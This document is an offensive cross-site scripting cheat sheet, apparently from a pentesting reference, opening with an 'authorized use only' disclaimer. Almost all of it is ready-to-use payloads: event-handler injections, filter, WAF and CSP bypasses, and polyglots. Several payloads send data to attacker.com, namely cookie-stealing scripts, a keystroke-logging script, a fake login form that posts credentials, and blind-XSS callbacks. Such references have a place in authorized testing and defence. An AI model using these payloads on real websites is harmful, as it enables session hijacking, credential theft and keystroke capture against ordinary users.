XSS
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
BASIC PAYLOADS#
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
EVENT HANDLERS#
# img tag <img src=x onerror=alert(1)> <img src=x onerror="alert(1)"> <img/src=x onerror=alert(1)> <img src=x onload=alert(1)> # svg tag <svg onload=alert(1)> <svg/onload=alert(1)> <svg onload="alert(1)"> <svg><script>alert(1)</script></svg> # body tag <body onload=alert(1)> <body onpageshow=alert(1)> <body onfocus=alert(1)> <body onhashchange=alert(1)> # input tag <input onfocus=alert(1) autofocus> <input onblur=alert(1) autofocus><input autofocus> <input type=image src=x onerror=alert(1)> # details tag <details open ontoggle=alert(1)> # marquee tag <marquee onstart=alert(1)> # video/audio <video src=x onerror=alert(1)> <audio src=x onerror=alert(1)> <video><source onerror=alert(1)> # iframe <iframe onload=alert(1)> <iframe src="javascript:alert(1)"> # object/embed <object data="javascript:alert(1)"> <embed src="javascript:alert(1)"> # math <math href="javascript:alert(1)">click</math> # table <table background="javascript:alert(1)">
HREF/SRC ATTRIBUTES#
<a href="javascript:alert(1)">click</a> <a href="data:text/html,<script>alert(1)</script>">click</a> <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">click</a> # Form action <form action="javascript:alert(1)"><input type=submit> <form><button formaction="javascript:alert(1)">click</button> # Base tag <base href="javascript:alert(1)//">
DOM-BASED XSS#
# Common sinks
document.write()
document.writeln()
element.innerHTML
element.outerHTML
element.insertAdjacentHTML()
eval()
setTimeout()
setInterval()
new Function()
location.href
location.assign()
location.replace()
# Common sources
document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location.href
location.search
location.hash
document.cookie
document.referrer
window.name
# Payloads
<img src=x onerror=eval(atob('YWxlcnQoMSk='))>
<img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))>
FILTER BYPASS#
# Case variation <ScRiPt>alert(1)</ScRiPt> <SCRIPT>alert(1)</SCRIPT> # No quotes <img src=x onerror=alert(1)> <img src=x onerror=alert`1`> # No parentheses <img src=x onerror=alert`1`> <img src=x onerror=throw/a]onerror=alert(1)//> <script>onerror=alert;throw 1</script> # No spaces <svg/onload=alert(1)> <img/src=x/onerror=alert(1)> # HTML encoding <img src=x onerror=alert(1)> <img src=x onerror=alert(1)> # URL encoding <a href="javascript:%61%6c%65%72%74(1)">click</a> # Double encoding %253Cscript%253Ealert(1)%253C/script%253E # Unicode encoding <script>\u0061\u006c\u0065\u0072\u0074(1)</script> # Null bytes <scr%00ipt>alert(1)</script> # Newlines/tabs <img src=x onerror =alert(1)> <script>al ert(1)</script> # Comments <script>/**/alert(1)/**/</script> <!--><script>alert(1)</script>
POLYGLOTS#
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e '">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%telerik;telerik>'>">
COOKIE STEALING#
<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script>
<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>
<script>new Image().src='http://attacker.com/steal.php?c='+document.cookie</script>
<img src=x onerror="this.src='http://attacker.com/steal.php?c='+document.cookie">
KEYLOGGER#
<script>
document.onkeypress=function(e){
fetch('http://attacker.com/log?k='+e.key);
}
</script>
PHISHING/DEFACEMENT#
<script>document.body.innerHTML='<h1>Hacked</h1>'</script> <script> document.body.innerHTML='<form action="http://attacker.com/steal"><input name="user" placeholder="Username"><input name="pass" type="password" placeholder="Password"><input type="submit"></form>'; </script>
TEMPLATE INJECTION#
# AngularJS
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
# Vue.js
{{_c.constructor('alert(1)')()}}
# React (dangerouslySetInnerHTML)
<div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}}/>
CONTEXT ESCAPING#
# Inside JavaScript string ';alert(1)// \';alert(1)// </script><script>alert(1)</script> # Inside HTML attribute " onmouseover=alert(1) ' onmouseover=alert(1) " onfocus=alert(1) autofocus=" ' onfocus=alert(1) autofocus=' # Inside href javascript:alert(1) data:text/html,<script>alert(1)</script> # Inside script block </script><script>alert(1)</script> # Inside style </style><script>alert(1)</script>
MUTATION XSS#
<noscript><p title="</noscript><script>alert(1)</script>"> <svg><![CDATA[><script>alert(1)</script>]]></svg>
BLIND XSS PAYLOADS#
# XSS Hunter style
"><script src=https://yoursubdomain.xss.ht></script>
<script src=https://yoursubdomain.xss.ht></script>
'"><script src=https://yoursubdomain.xss.ht></script>
# Custom callback
<script>fetch('https://attacker.com/xss?url='+encodeURIComponent(location.href)+'&cookie='+encodeURIComponent(document.cookie))</script>
WAF BYPASS TECHNIQUES#
# JavaScript without parentheses
<script>onerror=alert;throw 1</script>
<script>throw/a]onerror=alert(1)//</script>
# Without alert/confirm/prompt
<script>[].constructor.constructor("return this")().alert(1)</script>
<script>self['ale'+'rt'](1)</script>
<script>top['al'+'ert'](1)</script>
# Without script tag
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
# Obfuscation
<script>eval(atob('YWxlcnQoMSk='))</script>
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
CSP BYPASS#
# If 'unsafe-inline' is set
<script>alert(1)</script>
# If 'unsafe-eval' is set
<script>eval('alert(1)')</script>
# JSONP endpoints
<script src="https://allowed.com/jsonp?callback=alert"></script>
# Angular (if allowed)
<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>
# Base tag
<base href="http://attacker.com/">
TESTING CHECKLIST#
[ ] Reflected XSS in URL parameters [ ] Reflected XSS in form inputs [ ] Stored XSS in user profiles [ ] Stored XSS in comments/posts [ ] DOM-based XSS [ ] XSS in file uploads (filename, SVG) [ ] XSS in error messages [ ] XSS in HTTP headers (Referer, User-Agent) [ ] XSS in JSON responses [ ] XSS in XML responses [ ] Filter/WAF bypass attempts [ ] CSP bypass attempts
TOOLS#
- XSStrike - Dalfox - XSS Hunter - Burp Suite - OWASP ZAP